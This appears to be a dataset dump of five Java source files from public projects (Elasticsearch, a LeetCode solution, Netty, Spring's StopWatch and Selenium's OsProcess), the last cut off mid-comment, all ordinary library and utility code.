file_id
int64 1
215k
| content
stringlengths 7
454k
| repo
stringlengths 6
113
| path
stringlengths 6
251
|
---|---|---|---|
1,001 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.watcher;
public class WatcherHandle<W extends ResourceWatcher> {
private final ResourceWatcherService.ResourceMonitor monitor;
private final W watcher;
WatcherHandle(ResourceWatcherService.ResourceMonitor monitor, W watcher) {
this.monitor = monitor;
this.watcher = watcher;
}
public W watcher() {
return watcher;
}
public ResourceWatcherService.Frequency frequency() {
return monitor.frequency;
}
public void stop() {
monitor.watchers.remove(watcher);
}
public void resume() {
monitor.watchers.add(watcher);
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/watcher/WatcherHandle.java |
1,002 | // A binary watch has 4 LEDs on the top which represent the hours (0-11), and the 6 LEDs on the bottom represent the minutes (0-59).
// Each LED represents a zero or one, with the least significant bit on the right.
// For example, the above binary watch reads "3:25".
// Given a non-negative integer n which represents the number of LEDs that are currently on, return all possible times the watch could represent.
// Example:
// Input: n = 1
// Return: ["1:00", "2:00", "4:00", "8:00", "0:01", "0:02", "0:04", "0:08", "0:16", "0:32"]
// Note:
// The order of output does not matter.
// The hour must not contain a leading zero, for example "01:00" is not valid, it should be "1:00".
// The minute must be consist of two digits and may contain a leading zero, for example "10:2" is not valid, it should be "10:02".
public class BinaryWatch {
public List<String> readBinaryWatch(int num) {
ArrayList<String> allTimes = new ArrayList<String>();
//iterate through all possible time combinations
for(int i = 0; i < 12; i++) {
for(int j = 0; j < 60; j++) {
//if the current number and n have the same number of bits the time is possible
if(Integer.bitCount(i * 64 + j) == num) {
//add the current time to all times arraylist
allTimes.add(String.format("%d:%02d", i, j));
}
}
}
return allTimes;
}
}
| kdn251/interviews | leetcode/bit-manipulation/BinaryWatch.java |
1,003 | /*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package io.netty.channel;
import io.netty.buffer.ByteBufAllocator;
import io.netty.util.internal.ObjectUtil;
import java.util.IdentityHashMap;
import java.util.Map;
import java.util.Map.Entry;
import java.util.concurrent.atomic.AtomicIntegerFieldUpdater;
import java.util.concurrent.atomic.AtomicReferenceFieldUpdater;
import static io.netty.channel.ChannelOption.ALLOCATOR;
import static io.netty.channel.ChannelOption.AUTO_CLOSE;
import static io.netty.channel.ChannelOption.AUTO_READ;
import static io.netty.channel.ChannelOption.CONNECT_TIMEOUT_MILLIS;
import static io.netty.channel.ChannelOption.MAX_MESSAGES_PER_READ;
import static io.netty.channel.ChannelOption.MAX_MESSAGES_PER_WRITE;
import static io.netty.channel.ChannelOption.MESSAGE_SIZE_ESTIMATOR;
import static io.netty.channel.ChannelOption.RCVBUF_ALLOCATOR;
import static io.netty.channel.ChannelOption.SINGLE_EVENTEXECUTOR_PER_GROUP;
import static io.netty.channel.ChannelOption.WRITE_BUFFER_HIGH_WATER_MARK;
import static io.netty.channel.ChannelOption.WRITE_BUFFER_LOW_WATER_MARK;
import static io.netty.channel.ChannelOption.WRITE_BUFFER_WATER_MARK;
import static io.netty.channel.ChannelOption.WRITE_SPIN_COUNT;
import static io.netty.util.internal.ObjectUtil.checkNotNull;
import static io.netty.util.internal.ObjectUtil.checkPositive;
import static io.netty.util.internal.ObjectUtil.checkPositiveOrZero;
/**
* The default {@link ChannelConfig} implementation.
*/
public class DefaultChannelConfig implements ChannelConfig {
private static final MessageSizeEstimator DEFAULT_MSG_SIZE_ESTIMATOR = DefaultMessageSizeEstimator.DEFAULT;
private static final int DEFAULT_CONNECT_TIMEOUT = 30000;
private static final AtomicIntegerFieldUpdater<DefaultChannelConfig> AUTOREAD_UPDATER =
AtomicIntegerFieldUpdater.newUpdater(DefaultChannelConfig.class, "autoRead");
private static final AtomicReferenceFieldUpdater<DefaultChannelConfig, WriteBufferWaterMark> WATERMARK_UPDATER =
AtomicReferenceFieldUpdater.newUpdater(
DefaultChannelConfig.class, WriteBufferWaterMark.class, "writeBufferWaterMark");
protected final Channel channel;
private volatile ByteBufAllocator allocator = ByteBufAllocator.DEFAULT;
private volatile RecvByteBufAllocator rcvBufAllocator;
private volatile MessageSizeEstimator msgSizeEstimator = DEFAULT_MSG_SIZE_ESTIMATOR;
private volatile int connectTimeoutMillis = DEFAULT_CONNECT_TIMEOUT;
private volatile int writeSpinCount = 16;
private volatile int maxMessagesPerWrite = Integer.MAX_VALUE;
@SuppressWarnings("FieldMayBeFinal")
private volatile int autoRead = 1;
private volatile boolean autoClose = true;
private volatile WriteBufferWaterMark writeBufferWaterMark = WriteBufferWaterMark.DEFAULT;
private volatile boolean pinEventExecutor = true;
public DefaultChannelConfig(Channel channel) {
this(channel, new AdaptiveRecvByteBufAllocator());
}
protected DefaultChannelConfig(Channel channel, RecvByteBufAllocator allocator) {
setRecvByteBufAllocator(allocator, channel.metadata());
this.channel = channel;
}
@Override
@SuppressWarnings("deprecation")
public Map<ChannelOption<?>, Object> getOptions() {
return getOptions(
null,
CONNECT_TIMEOUT_MILLIS, MAX_MESSAGES_PER_READ, WRITE_SPIN_COUNT,
ALLOCATOR, AUTO_READ, AUTO_CLOSE, RCVBUF_ALLOCATOR, WRITE_BUFFER_HIGH_WATER_MARK,
WRITE_BUFFER_LOW_WATER_MARK, WRITE_BUFFER_WATER_MARK, MESSAGE_SIZE_ESTIMATOR,
SINGLE_EVENTEXECUTOR_PER_GROUP, MAX_MESSAGES_PER_WRITE);
}
protected Map<ChannelOption<?>, Object> getOptions(
Map<ChannelOption<?>, Object> result, ChannelOption<?>... options) {
if (result == null) {
result = new IdentityHashMap<ChannelOption<?>, Object>();
}
for (ChannelOption<?> o: options) {
result.put(o, getOption(o));
}
return result;
}
@SuppressWarnings("unchecked")
@Override
public boolean setOptions(Map<ChannelOption<?>, ?> options) {
ObjectUtil.checkNotNull(options, "options");
boolean setAllOptions = true;
for (Entry<ChannelOption<?>, ?> e: options.entrySet()) {
if (!setOption((ChannelOption<Object>) e.getKey(), e.getValue())) {
setAllOptions = false;
}
}
return setAllOptions;
}
@Override
@SuppressWarnings({ "unchecked", "deprecation" })
public <T> T getOption(ChannelOption<T> option) {
ObjectUtil.checkNotNull(option, "option");
if (option == CONNECT_TIMEOUT_MILLIS) {
return (T) Integer.valueOf(getConnectTimeoutMillis());
}
if (option == MAX_MESSAGES_PER_READ) {
return (T) Integer.valueOf(getMaxMessagesPerRead());
}
if (option == WRITE_SPIN_COUNT) {
return (T) Integer.valueOf(getWriteSpinCount());
}
if (option == ALLOCATOR) {
return (T) getAllocator();
}
if (option == RCVBUF_ALLOCATOR) {
return (T) getRecvByteBufAllocator();
}
if (option == AUTO_READ) {
return (T) Boolean.valueOf(isAutoRead());
}
if (option == AUTO_CLOSE) {
return (T) Boolean.valueOf(isAutoClose());
}
if (option == WRITE_BUFFER_HIGH_WATER_MARK) {
return (T) Integer.valueOf(getWriteBufferHighWaterMark());
}
if (option == WRITE_BUFFER_LOW_WATER_MARK) {
return (T) Integer.valueOf(getWriteBufferLowWaterMark());
}
if (option == WRITE_BUFFER_WATER_MARK) {
return (T) getWriteBufferWaterMark();
}
if (option == MESSAGE_SIZE_ESTIMATOR) {
return (T) getMessageSizeEstimator();
}
if (option == SINGLE_EVENTEXECUTOR_PER_GROUP) {
return (T) Boolean.valueOf(getPinEventExecutorPerGroup());
}
if (option == MAX_MESSAGES_PER_WRITE) {
return (T) Integer.valueOf(getMaxMessagesPerWrite());
}
return null;
}
@Override
@SuppressWarnings("deprecation")
public <T> boolean setOption(ChannelOption<T> option, T value) {
validate(option, value);
if (option == CONNECT_TIMEOUT_MILLIS) {
setConnectTimeoutMillis((Integer) value);
} else if (option == MAX_MESSAGES_PER_READ) {
setMaxMessagesPerRead((Integer) value);
} else if (option == WRITE_SPIN_COUNT) {
setWriteSpinCount((Integer) value);
} else if (option == ALLOCATOR) {
setAllocator((ByteBufAllocator) value);
} else if (option == RCVBUF_ALLOCATOR) {
setRecvByteBufAllocator((RecvByteBufAllocator) value);
} else if (option == AUTO_READ) {
setAutoRead((Boolean) value);
} else if (option == AUTO_CLOSE) {
setAutoClose((Boolean) value);
} else if (option == WRITE_BUFFER_HIGH_WATER_MARK) {
setWriteBufferHighWaterMark((Integer) value);
} else if (option == WRITE_BUFFER_LOW_WATER_MARK) {
setWriteBufferLowWaterMark((Integer) value);
} else if (option == WRITE_BUFFER_WATER_MARK) {
setWriteBufferWaterMark((WriteBufferWaterMark) value);
} else if (option == MESSAGE_SIZE_ESTIMATOR) {
setMessageSizeEstimator((MessageSizeEstimator) value);
} else if (option == SINGLE_EVENTEXECUTOR_PER_GROUP) {
setPinEventExecutorPerGroup((Boolean) value);
} else if (option == MAX_MESSAGES_PER_WRITE) {
setMaxMessagesPerWrite((Integer) value);
} else {
return false;
}
return true;
}
protected <T> void validate(ChannelOption<T> option, T value) {
ObjectUtil.checkNotNull(option, "option").validate(value);
}
@Override
public int getConnectTimeoutMillis() {
return connectTimeoutMillis;
}
@Override
public ChannelConfig setConnectTimeoutMillis(int connectTimeoutMillis) {
checkPositiveOrZero(connectTimeoutMillis, "connectTimeoutMillis");
this.connectTimeoutMillis = connectTimeoutMillis;
return this;
}
/**
* {@inheritDoc}
* <p>
* @throws IllegalStateException if {@link #getRecvByteBufAllocator()} does not return an object of type
* {@link MaxMessagesRecvByteBufAllocator}.
*/
@Override
@Deprecated
public int getMaxMessagesPerRead() {
try {
MaxMessagesRecvByteBufAllocator allocator = getRecvByteBufAllocator();
return allocator.maxMessagesPerRead();
} catch (ClassCastException e) {
throw new IllegalStateException("getRecvByteBufAllocator() must return an object of type " +
"MaxMessagesRecvByteBufAllocator", e);
}
}
/**
* {@inheritDoc}
* <p>
* @throws IllegalStateException if {@link #getRecvByteBufAllocator()} does not return an object of type
* {@link MaxMessagesRecvByteBufAllocator}.
*/
@Override
@Deprecated
public ChannelConfig setMaxMessagesPerRead(int maxMessagesPerRead) {
try {
MaxMessagesRecvByteBufAllocator allocator = getRecvByteBufAllocator();
allocator.maxMessagesPerRead(maxMessagesPerRead);
return this;
} catch (ClassCastException e) {
throw new IllegalStateException("getRecvByteBufAllocator() must return an object of type " +
"MaxMessagesRecvByteBufAllocator", e);
}
}
/**
* Get the maximum number of message to write per eventloop run. Once this limit is
* reached we will continue to process other events before trying to write the remaining messages.
*/
public int getMaxMessagesPerWrite() {
return maxMessagesPerWrite;
}
/**
* Set the maximum number of message to write per eventloop run. Once this limit is
* reached we will continue to process other events before trying to write the remaining messages.
*/
public ChannelConfig setMaxMessagesPerWrite(int maxMessagesPerWrite) {
this.maxMessagesPerWrite = ObjectUtil.checkPositive(maxMessagesPerWrite, "maxMessagesPerWrite");
return this;
}
@Override
public int getWriteSpinCount() {
return writeSpinCount;
}
@Override
public ChannelConfig setWriteSpinCount(int writeSpinCount) {
checkPositive(writeSpinCount, "writeSpinCount");
// Integer.MAX_VALUE is used as a special value in the channel implementations to indicate the channel cannot
// accept any more data, and results in the writeOp being set on the selector (or execute a runnable which tries
// to flush later because the writeSpinCount quantum has been exhausted). This strategy prevents additional
// conditional logic in the channel implementations, and shouldn't be noticeable in practice.
if (writeSpinCount == Integer.MAX_VALUE) {
--writeSpinCount;
}
this.writeSpinCount = writeSpinCount;
return this;
}
@Override
public ByteBufAllocator getAllocator() {
return allocator;
}
@Override
public ChannelConfig setAllocator(ByteBufAllocator allocator) {
this.allocator = ObjectUtil.checkNotNull(allocator, "allocator");
return this;
}
@SuppressWarnings("unchecked")
@Override
public <T extends RecvByteBufAllocator> T getRecvByteBufAllocator() {
return (T) rcvBufAllocator;
}
@Override
public ChannelConfig setRecvByteBufAllocator(RecvByteBufAllocator allocator) {
rcvBufAllocator = checkNotNull(allocator, "allocator");
return this;
}
/**
* Set the {@link RecvByteBufAllocator} which is used for the channel to allocate receive buffers.
* @param allocator the allocator to set.
* @param metadata Used to set the {@link ChannelMetadata#defaultMaxMessagesPerRead()} if {@code allocator}
* is of type {@link MaxMessagesRecvByteBufAllocator}.
*/
private void setRecvByteBufAllocator(RecvByteBufAllocator allocator, ChannelMetadata metadata) {
checkNotNull(allocator, "allocator");
checkNotNull(metadata, "metadata");
if (allocator instanceof MaxMessagesRecvByteBufAllocator) {
((MaxMessagesRecvByteBufAllocator) allocator).maxMessagesPerRead(metadata.defaultMaxMessagesPerRead());
}
setRecvByteBufAllocator(allocator);
}
@Override
public boolean isAutoRead() {
return autoRead == 1;
}
@Override
public ChannelConfig setAutoRead(boolean autoRead) {
boolean oldAutoRead = AUTOREAD_UPDATER.getAndSet(this, autoRead ? 1 : 0) == 1;
if (autoRead && !oldAutoRead) {
channel.read();
} else if (!autoRead && oldAutoRead) {
autoReadCleared();
}
return this;
}
/**
* Is called once {@link #setAutoRead(boolean)} is called with {@code false} and {@link #isAutoRead()} was
* {@code true} before.
*/
protected void autoReadCleared() { }
@Override
public boolean isAutoClose() {
return autoClose;
}
@Override
public ChannelConfig setAutoClose(boolean autoClose) {
this.autoClose = autoClose;
return this;
}
@Override
public int getWriteBufferHighWaterMark() {
return writeBufferWaterMark.high();
}
@Override
public ChannelConfig setWriteBufferHighWaterMark(int writeBufferHighWaterMark) {
checkPositiveOrZero(writeBufferHighWaterMark, "writeBufferHighWaterMark");
for (;;) {
WriteBufferWaterMark waterMark = writeBufferWaterMark;
if (writeBufferHighWaterMark < waterMark.low()) {
throw new IllegalArgumentException(
"writeBufferHighWaterMark cannot be less than " +
"writeBufferLowWaterMark (" + waterMark.low() + "): " +
writeBufferHighWaterMark);
}
if (WATERMARK_UPDATER.compareAndSet(this, waterMark,
new WriteBufferWaterMark(waterMark.low(), writeBufferHighWaterMark, false))) {
return this;
}
}
}
@Override
public int getWriteBufferLowWaterMark() {
return writeBufferWaterMark.low();
}
@Override
public ChannelConfig setWriteBufferLowWaterMark(int writeBufferLowWaterMark) {
checkPositiveOrZero(writeBufferLowWaterMark, "writeBufferLowWaterMark");
for (;;) {
WriteBufferWaterMark waterMark = writeBufferWaterMark;
if (writeBufferLowWaterMark > waterMark.high()) {
throw new IllegalArgumentException(
"writeBufferLowWaterMark cannot be greater than " +
"writeBufferHighWaterMark (" + waterMark.high() + "): " +
writeBufferLowWaterMark);
}
if (WATERMARK_UPDATER.compareAndSet(this, waterMark,
new WriteBufferWaterMark(writeBufferLowWaterMark, waterMark.high(), false))) {
return this;
}
}
}
@Override
public ChannelConfig setWriteBufferWaterMark(WriteBufferWaterMark writeBufferWaterMark) {
this.writeBufferWaterMark = checkNotNull(writeBufferWaterMark, "writeBufferWaterMark");
return this;
}
@Override
public WriteBufferWaterMark getWriteBufferWaterMark() {
return writeBufferWaterMark;
}
@Override
public MessageSizeEstimator getMessageSizeEstimator() {
return msgSizeEstimator;
}
@Override
public ChannelConfig setMessageSizeEstimator(MessageSizeEstimator estimator) {
this.msgSizeEstimator = ObjectUtil.checkNotNull(estimator, "estimator");
return this;
}
private ChannelConfig setPinEventExecutorPerGroup(boolean pinEventExecutor) {
this.pinEventExecutor = pinEventExecutor;
return this;
}
private boolean getPinEventExecutorPerGroup() {
return pinEventExecutor;
}
}
| netty/netty | transport/src/main/java/io/netty/channel/DefaultChannelConfig.java |
1,004 | /*
* Copyright 2002-2023 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.util;
import java.text.NumberFormat;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.concurrent.TimeUnit;
import org.springframework.lang.Nullable;
/**
* Simple stop watch, allowing for timing of a number of tasks, exposing total
* running time and running time for each named task.
*
* <p>Conceals use of {@link System#nanoTime()}, improving the readability of
* application code and reducing the likelihood of calculation errors.
*
* <p>Note that this object is not designed to be thread-safe and does not use
* synchronization.
*
* <p>This class is normally used to verify performance during proof-of-concept
* work and in development, rather than as part of production applications.
*
* <p>As of Spring Framework 5.2, running time is tracked and reported in
* nanoseconds. As of 6.1, the default time unit for String renderings is
* seconds with decimal points in nanosecond precision. Custom renderings with
* specific time units can be requested through {@link #prettyPrint(TimeUnit)}.
*
* @author Rod Johnson
* @author Juergen Hoeller
* @author Sam Brannen
* @since May 2, 2001
* @see #start()
* @see #stop()
* @see #shortSummary()
* @see #prettyPrint()
*/
public class StopWatch {
/**
* Identifier of this {@code StopWatch}.
* <p>Handy when we have output from multiple stop watches and need to
* distinguish between them in log or console output.
*/
private final String id;
@Nullable
private List<TaskInfo> taskList = new ArrayList<>(1);
/** Start time of the current task. */
private long startTimeNanos;
/** Name of the current task. */
@Nullable
private String currentTaskName;
@Nullable
private TaskInfo lastTaskInfo;
private int taskCount;
/** Total running time. */
private long totalTimeNanos;
/**
* Construct a new {@code StopWatch}.
* <p>Does not start any task.
*/
public StopWatch() {
this("");
}
/**
* Construct a new {@code StopWatch} with the given id.
* <p>The id is handy when we have output from multiple stop watches and need
* to distinguish between them.
* <p>Does not start any task.
* @param id identifier for this stop watch
*/
public StopWatch(String id) {
this.id = id;
}
/**
* Get the id of this {@code StopWatch}, as specified on construction.
* @return the id (empty String by default)
* @since 4.2.2
* @see #StopWatch(String)
*/
public String getId() {
return this.id;
}
/**
* Configure whether the {@link TaskInfo} array is built over time.
* <p>Set this to {@code false} when using a {@code StopWatch} for millions of
* tasks; otherwise, the {@code TaskInfo} structure will consume excessive memory.
* <p>Default is {@code true}.
*/
public void setKeepTaskList(boolean keepTaskList) {
this.taskList = (keepTaskList ? new ArrayList<>() : null);
}
/**
* Start an unnamed task.
* <p>The results are undefined if {@link #stop()} or timing methods are
* called without invoking this method first.
* @see #start(String)
* @see #stop()
*/
public void start() throws IllegalStateException {
start("");
}
/**
* Start a named task.
* <p>The results are undefined if {@link #stop()} or timing methods are
* called without invoking this method first.
* @param taskName the name of the task to start
* @see #start()
* @see #stop()
*/
public void start(String taskName) throws IllegalStateException {
if (this.currentTaskName != null) {
throw new IllegalStateException("Can't start StopWatch: it's already running");
}
this.currentTaskName = taskName;
this.startTimeNanos = System.nanoTime();
}
/**
* Stop the current task.
* <p>The results are undefined if timing methods are called without invoking
* at least one pair of {@code start()} / {@code stop()} methods.
* @see #start()
* @see #start(String)
*/
public void stop() throws IllegalStateException {
if (this.currentTaskName == null) {
throw new IllegalStateException("Can't stop StopWatch: it's not running");
}
long lastTime = System.nanoTime() - this.startTimeNanos;
this.totalTimeNanos += lastTime;
this.lastTaskInfo = new TaskInfo(this.currentTaskName, lastTime);
if (this.taskList != null) {
this.taskList.add(this.lastTaskInfo);
}
++this.taskCount;
this.currentTaskName = null;
}
/**
* Determine whether this {@code StopWatch} is currently running.
* @see #currentTaskName()
*/
public boolean isRunning() {
return (this.currentTaskName != null);
}
/**
* Get the name of the currently running task, if any.
* @since 4.2.2
* @see #isRunning()
*/
@Nullable
public String currentTaskName() {
return this.currentTaskName;
}
/**
* Get the last task as a {@link TaskInfo} object.
* @throws IllegalStateException if no tasks have run yet
* @since 6.1
*/
public TaskInfo lastTaskInfo() throws IllegalStateException {
Assert.state(this.lastTaskInfo != null, "No tasks run");
return this.lastTaskInfo;
}
/**
* Get the last task as a {@link TaskInfo} object.
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public TaskInfo getLastTaskInfo() throws IllegalStateException {
return lastTaskInfo();
}
/**
* Get the name of the last task.
* @see TaskInfo#getTaskName()
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public String getLastTaskName() throws IllegalStateException {
return lastTaskInfo().getTaskName();
}
/**
* Get the time taken by the last task in nanoseconds.
* @since 5.2
* @see TaskInfo#getTimeNanos()
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public long getLastTaskTimeNanos() throws IllegalStateException {
return lastTaskInfo().getTimeNanos();
}
/**
* Get the time taken by the last task in milliseconds.
* @see TaskInfo#getTimeMillis()
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public long getLastTaskTimeMillis() throws IllegalStateException {
return lastTaskInfo().getTimeMillis();
}
/**
* Get an array of the data for tasks performed.
* @see #setKeepTaskList
*/
public TaskInfo[] getTaskInfo() {
if (this.taskList == null) {
throw new UnsupportedOperationException("Task info is not being kept!");
}
return this.taskList.toArray(new TaskInfo[0]);
}
/**
* Get the number of tasks timed.
*/
public int getTaskCount() {
return this.taskCount;
}
/**
* Get the total time for all tasks in nanoseconds.
* @since 5.2
* @see #getTotalTime(TimeUnit)
*/
public long getTotalTimeNanos() {
return this.totalTimeNanos;
}
/**
* Get the total time for all tasks in milliseconds.
* @see #getTotalTime(TimeUnit)
*/
public long getTotalTimeMillis() {
return TimeUnit.NANOSECONDS.toMillis(this.totalTimeNanos);
}
/**
* Get the total time for all tasks in seconds.
* @see #getTotalTime(TimeUnit)
*/
public double getTotalTimeSeconds() {
return getTotalTime(TimeUnit.SECONDS);
}
/**
* Get the total time for all tasks in the requested time unit
* (with decimal points in nanosecond precision).
* @param timeUnit the unit to use
* @since 6.1
* @see #getTotalTimeNanos()
* @see #getTotalTimeMillis()
* @see #getTotalTimeSeconds()
*/
public double getTotalTime(TimeUnit timeUnit) {
return (double) this.totalTimeNanos / TimeUnit.NANOSECONDS.convert(1, timeUnit);
}
/**
* Generate a table describing all tasks performed in seconds
* (with decimal points in nanosecond precision).
* <p>For custom reporting, call {@link #getTaskInfo()} and use the data directly.
* @see #prettyPrint(TimeUnit)
* @see #getTotalTimeSeconds()
* @see TaskInfo#getTimeSeconds()
*/
public String prettyPrint() {
return prettyPrint(TimeUnit.SECONDS);
}
/**
* Generate a table describing all tasks performed in the requested time unit
* (with decimal points in nanosecond precision).
* <p>For custom reporting, call {@link #getTaskInfo()} and use the data directly.
* @param timeUnit the unit to use for rendering total time and task time
* @since 6.1
* @see #prettyPrint()
* @see #getTotalTime(TimeUnit)
* @see TaskInfo#getTime(TimeUnit)
*/
public String prettyPrint(TimeUnit timeUnit) {
NumberFormat nf = NumberFormat.getNumberInstance(Locale.ENGLISH);
nf.setMaximumFractionDigits(9);
nf.setGroupingUsed(false);
NumberFormat pf = NumberFormat.getPercentInstance(Locale.ENGLISH);
pf.setMinimumIntegerDigits(2);
pf.setGroupingUsed(false);
StringBuilder sb = new StringBuilder(128);
sb.append("StopWatch '").append(getId()).append("': ");
String total = (timeUnit == TimeUnit.NANOSECONDS ?
nf.format(getTotalTimeNanos()) : nf.format(getTotalTime(timeUnit)));
sb.append(total).append(" ").append(timeUnit.name().toLowerCase(Locale.ENGLISH));
int width = Math.max(sb.length(), 40);
sb.append("\n");
if (this.taskList != null) {
String line = "-".repeat(width) + "\n";
String unitName = timeUnit.name();
unitName = unitName.charAt(0) + unitName.substring(1).toLowerCase(Locale.ENGLISH);
unitName = String.format("%-12s", unitName);
sb.append(line);
sb.append(unitName).append(" % Task name\n");
sb.append(line);
int digits = total.indexOf('.');
if (digits < 0) {
digits = total.length();
}
nf.setMinimumIntegerDigits(digits);
nf.setMaximumFractionDigits(10 - digits);
for (TaskInfo task : this.taskList) {
sb.append(String.format("%-14s", (timeUnit == TimeUnit.NANOSECONDS ?
nf.format(task.getTimeNanos()) : nf.format(task.getTime(timeUnit)))));
sb.append(String.format("%-8s",
pf.format(task.getTimeSeconds() / getTotalTimeSeconds())));
sb.append(task.getTaskName()).append('\n');
}
}
else {
sb.append("No task info kept");
}
return sb.toString();
}
/**
* Get a short description of the total running time in seconds.
* @see #prettyPrint()
* @see #prettyPrint(TimeUnit)
*/
public String shortSummary() {
return "StopWatch '" + getId() + "': " + getTotalTimeSeconds() + " seconds";
}
/**
* Generate an informative string describing all tasks performed in seconds.
* @see #prettyPrint()
* @see #prettyPrint(TimeUnit)
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder(shortSummary());
if (this.taskList != null) {
for (TaskInfo task : this.taskList) {
sb.append("; [").append(task.getTaskName()).append("] took ").append(task.getTimeSeconds()).append(" seconds");
long percent = Math.round(100.0 * task.getTimeSeconds() / getTotalTimeSeconds());
sb.append(" = ").append(percent).append('%');
}
}
else {
sb.append("; no task info kept");
}
return sb.toString();
}
/**
* Nested class to hold data about one task executed within the {@code StopWatch}.
*/
public static final class TaskInfo {
private final String taskName;
private final long timeNanos;
TaskInfo(String taskName, long timeNanos) {
this.taskName = taskName;
this.timeNanos = timeNanos;
}
/**
* Get the name of this task.
*/
public String getTaskName() {
return this.taskName;
}
/**
* Get the time this task took in nanoseconds.
* @since 5.2
* @see #getTime(TimeUnit)
*/
public long getTimeNanos() {
return this.timeNanos;
}
/**
* Get the time this task took in milliseconds.
* @see #getTime(TimeUnit)
*/
public long getTimeMillis() {
return TimeUnit.NANOSECONDS.toMillis(this.timeNanos);
}
/**
* Get the time this task took in seconds.
* @see #getTime(TimeUnit)
*/
public double getTimeSeconds() {
return getTime(TimeUnit.SECONDS);
}
/**
* Get the time this task took in the requested time unit
* (with decimal points in nanosecond precision).
* @param timeUnit the unit to use
* @since 6.1
* @see #getTimeNanos()
* @see #getTimeMillis()
* @see #getTimeSeconds()
*/
public double getTime(TimeUnit timeUnit) {
return (double) this.timeNanos / TimeUnit.NANOSECONDS.convert(1, timeUnit);
}
}
}
| spring-projects/spring-framework | spring-core/src/main/java/org/springframework/util/StopWatch.java |
1,005 | // Licensed to the Software Freedom Conservancy (SFC) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The SFC licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package org.openqa.selenium.os;
import static java.util.Collections.unmodifiableMap;
import static java.util.concurrent.TimeUnit.SECONDS;
import static org.openqa.selenium.Platform.WINDOWS;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.nio.charset.Charset;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.TimeUnit;
import java.util.logging.Level;
import java.util.logging.Logger;
import org.apache.commons.exec.DaemonExecutor;
import org.apache.commons.exec.DefaultExecuteResultHandler;
import org.apache.commons.exec.ExecuteWatchdog;
import org.apache.commons.exec.Executor;
import org.apache.commons.exec.PumpStreamHandler;
import org.openqa.selenium.Platform;
import org.openqa.selenium.TimeoutException;
import org.openqa.selenium.WebDriverException;
import org.openqa.selenium.internal.Require;
import org.openqa.selenium.io.CircularOutputStream;
import org.openqa.selenium.io.MultiOutputStream;
@Deprecated
class OsProcess {
private static final Logger LOG = Logger.getLogger(OsProcess.class.getName());
private final CircularOutputStream inputOut = new CircularOutputStream(32768);
private volatile String allInput;
private final DefaultExecuteResultHandler handler = new DefaultExecuteResultHandler();
private final Executor executor = new DaemonExecutor();
private volatile OutputStream drainTo;
private final SeleniumWatchDog executeWatchdog =
new SeleniumWatchDog(ExecuteWatchdog.INFINITE_TIMEOUT);
private PumpStreamHandler streamHandler;
private final org.apache.commons.exec.CommandLine cl;
private final Map<String, String> env = new ConcurrentHashMap<>();
public OsProcess(String executable, String... args) {
String actualExe = new ExecutableFinder().find(executable);
Require.state("Actual executable", actualExe)
.nonNull("Unable to find executable for: %s", executable);
cl = new org.apache.commons.exec.CommandLine(actualExe);
cl.addArguments(args, false);
}
public void setEnvironmentVariable(String name, String value) {
if (name == null) {
throw new IllegalArgumentException("Cannot have a null environment variable name!");
}
if (value == null) {
throw new IllegalArgumentException(
"Cannot have a null value for environment variable " + name);
}
env.put(name, value);
}
public Map<String, String> getEnvironment() {
return unmodifiableMap(new HashMap<>(env));
}
private Map<String, String> getMergedEnv() {
HashMap<String, String> newEnv = new HashMap<>(System.getenv());
newEnv.putAll(env);
return newEnv;
}
private ByteArrayInputStream getInputStream() {
return allInput != null
? new ByteArrayInputStream(allInput.getBytes(Charset.defaultCharset()))
: null;
}
public void executeAsync() {
try {
final OutputStream outputStream = getOutputStream();
executeWatchdog.reset();
executor.setWatchdog(executeWatchdog);
streamHandler = new PumpStreamHandler(outputStream, outputStream, getInputStream());
executor.setStreamHandler(streamHandler);
executor.execute(cl, getMergedEnv(), handler);
} catch (IOException e) {
throw new WebDriverException(e);
}
}
public boolean waitForProcessStarted(long duration, TimeUnit unit) {
return executeWatchdog.waitForProcessStarted(duration, unit);
}
private OutputStream getOutputStream() {
return drainTo == null ? inputOut : new MultiOutputStream(inputOut, drainTo);
}
public int destroy() {
SeleniumWatchDog watchdog = executeWatchdog;
if (watchdog.waitForProcessStarted(2, TimeUnit.MINUTES)) {
// I literally have no idea why we don't try and kill the process nicely on Windows. If you
// do,
